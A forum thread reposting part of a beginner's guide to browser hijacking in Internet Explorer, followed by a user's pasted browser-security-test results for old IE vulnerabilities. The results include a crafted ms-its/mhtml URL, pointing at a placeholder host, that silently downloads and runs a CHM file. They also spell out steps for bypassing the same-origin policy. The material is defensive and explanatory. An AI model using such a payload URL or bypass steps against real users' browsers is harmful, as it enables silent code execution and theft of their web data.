Browser Hijacking and How To Stop It

[Phaedrus]

A PCStats Guide

If you though Pop-ups were annoying, just wait until your web browser is hijacked! In this guide, PCstats shows you how to regain control and kick out the hijackers, kung-fu style...

Browser hijacking is one of the web's constant dangers. Whether it arrives in the form of a flood of obscene pop-up windows assaulting you after a mistyped URL, or malicious code taking over your browser completely, chances are good that every Internet user will be subjected to this practice in some form.

Fortunately, avoiding a browser hijacking is not impossible if you stay aware, and take a few simple precautions. Take the metaphor of locking your car doors while you are out for a drive as an example. If your browser keeps redirecting you to www.somerandomsite.com and you are here looking for ways to cure what ails you, we'll cover that too.

To sum it up, this PCstats Beginners Guide will show you how to avoid and defeat these annoying and potentially embarrassing attacks on your computer, starting with seven preventative measures;

1. Use common sense
2. Use and update an anti-virus program regularly
3. Use antivirus 'auto protection'
4. Keep an anti-hijack 'toolkit' for emergencies
5. Change your Internet Explorer security settings
6. Try an alternate browser

What's a Browser Hijacker?

This term covers a range of malicious software. The most generally accepted description for browser hijacking software is external code that changes your Internet Explorer settings. Generally your home page will be changed and new favourites will be added that point to sites of dubious content. In most cases, the hijacker will have made registry changes to your system, causing the home page to revert back to the unwanted destination even if you change it manually.

A browser Hijacker may also disallow access to certain web pages, for example the site of an anti-spyware software manufacturer like Lavasoft. These programs have also been known to disable Antivirus and anti-spyware software.

Most browser hijackers take advantage of Internet Explorer's ability to run ActiveX scripts straight from a web page. Generally, these programs will request permission to install themselves via a popup that loads when you visit a certain site. If you accidentally give them permission to install, IE will execute the program on your computer, changing your settings. Others may use security holes within Internet Explorer to install themselves automatically without any user interaction at all. Worse, these can be launched from popup ad windows which the user has not even intended to view.

As well as making changes to your home page and other Internet Explorer settings, a hijacker may also make entries to the HOSTS file on your system. This special file directly maps DNS addresses (web URLs) to IP addresses, so every time you typed 'www.pcstats.com' (as an example) you might be redirected to the IP address of a sponsored search or porn site instead.

Some browser hijackers may also install themselves onto your computer system as legitimate programs, leaving an entry in the 'add-remove programs' list in the control panel. There are many faces of broswer hijacking, and to combat the situation, you have to be aware of all the tricks and loopholes that make this scourge possible. Browser hijacking isn't necessarily a virus, and isn't necessarily adware, so stopping it isn't necessarily best left to software monitoring programs either.

Guide continued here.


Phaedrus

 

[MrTanaka]

http://texturizer.net/firefox/

Use Mozilla Friefox and you'll never have this problem as well as popups. I've forgotten what popups even look like!

 

[Phaedrus]

I love Mozilla, converted to it last year from an independent (3D Browse, which I love but which was contributing to massive headache problems) and have since gotten somewhat active in the Mozilla community and even worked on writign plugins and upgrades for it (not well, but working on it.)

The above post is aimed at the 95% or so people online who use IE, and the 95% of those people who never bother updating their security patches.


Phaedrus

 

[Phaedrus]

See also:

Browser Security Test

An excellent online tool from Scanit to search for exploits in your browser.


Phaedrus

 

[1cheater]

I will be a ginny pig for the browser scan test, below is my results

Browser Security Test Results
Dear Customer,

The Browser Security Test is finished. Please find the results below:

High Risk Vulnerabilities 1
Medium Risk Vulnerabilities 3
Low Risk Vulnerabilities 0

New bugs keep coming! Sign up for announcements of new tests.

Questions about the test? Read the FAQ.

Still having questions? Send us your feedback.

Want to know how everyone else is doing on Browser Test? Check our statistics.

High Risk Vulnerabilities
Microsoft Internet Explorer CHM File Processing Arbitrary Code Execution Vulnerability (bid9658)
Description
This bug can allow a malicious web site to automatically download and execute programs on your computer without your knowledge. This means that an attacker could infect your computer with a virus or install a program which may allow them to take control of your computer.

There is a virus found in the wild that uses this bug to infect computers.

Technical Details
CHM files are"Compiled HTML Help" files. This is a proprietary Microsoft format used for storing help files in Windows applications. CHM files can contain multiple HTML pages, tables of contents, indexes, etc.

When a CHM file is opened from a local disk, it is treated as trusted content, and the execution of scripts in CHM file is not restricted in any way. They can therefore start programs, write data to the disk, and so on.

When a user attempts to open a CHM file from a remote web site, normally Internet Explorer displays a dialog box asking what to do with the file. The dialog box includes a warning saying that the file can contain malicious content and allows the user to save the file without opening it.

This bug allows to bypass the warning from Internet Explorer and download and run a CHM file automatically. This is done by redirecting the IFRAME to a specially crafted URL like this: "URL:ms-its: mhtml: file://C:\\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm" Internet Explorer will download chm.chm file from the specified website and execute it without warning the user. The CHM file can contain scripts that will have complete access to the user's computer.


Recommendations
We recommend using Windows Update to correct this problem.

Additional Information

Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658)
TrendMicro: PHP.Bizai virus description
Microsoft Security Bulletin MS04-013. Cumulative Security Update for Outlook Express (837009)


Medium Risk Vulnerabilities
Microsoft Internet Explorer Document Reference Zone Bypass Vulnerability (bid5841)
Description
This bug can allow a malicious web site to access your data on other web sites. For example it can be used to read your mail from a web mail system.

Technical Details
A malicious web site can circumvent same origin policy by doing the following:

open a window in its own domain
save a reference to (NewWindow).location.assign function or (NewWindow).location.replace function
change the location of the window to a URL in a different domain
use a saved reference to change the location of the window to a javascript: URL.
The javascript URL will be executed in the domain of the window. Normally once the location is changed to a different domain Javascript engine should not allow access to the functions of that window from original domain. However calling the functions through the reference saved beforehand circumvents this check.

Recommendations
We recommend using Windows Update to correct this problem.

Additional Information

Microsoft Security Bulletin MS02-066
November 2002, Cumulative Patch for Internet Explorer (Q328970)
MSIE:"SaveRef" turns Zone off

Microsoft Internet Explorer Multimedia Page Cross-Site Scripting Vulnerability (bid6481)
Description
This bug can allow a malicious web site to access your data on other web sites. For example it can be used to read your mail from a web mail system. The attacked web site needs to have a Flash animation file on it for this attack to work.

Technical Details
MSIE generates a page to load a multimedia file instead of loading it directly. The automatically generated page for loading a Flash animation file contains the URL of that file -- without any encoding. An attacker can make a link to a Flash file on another web site including some Javascript code in the URL. When the user clicks the link the Javascript code will be executed in the context of the other web site.

Recommendations
We recommend using Windows Update to correct this problem.

Additional Information

Microsoft Security Bulletin MS03-015
April 2003, Cumulative Patch for Internet Explorer (813489)
(MSIE)A rather old trick for web server is now played on MSIE.

Microsoft Internet Explorer Dialog Style Same Origin Policy Bypass Vulnerability (bid6306)
Description
This bug can allow a malicious web site to access your data on other web sites. For example it can be used to read your mail from a web mail system.

Technical Details
A web site can open a document in a dialog box using showModalDialog function. The document can originate from any domain, not necessarily from the same domain as the document that calls this function. The document that calls this function can supply style information for the dialog box. Style data can contain Javascript code. This Javascript code will be executed in the context of the document that gets opened. Thus one website can get Javascript code in the context of some other web site.

Recommendations
We recommend using Windows Update to correct this problem.

LESSON FOR THE DAY, IF YOU DON'T PAY ATTENTION AND STAY UPDATED AT WINDOWS UPDate atleast 20 times a month YOU can expect to continue to be fawked by MICROSFT'S INEPT, fawking pos "PRODUCT"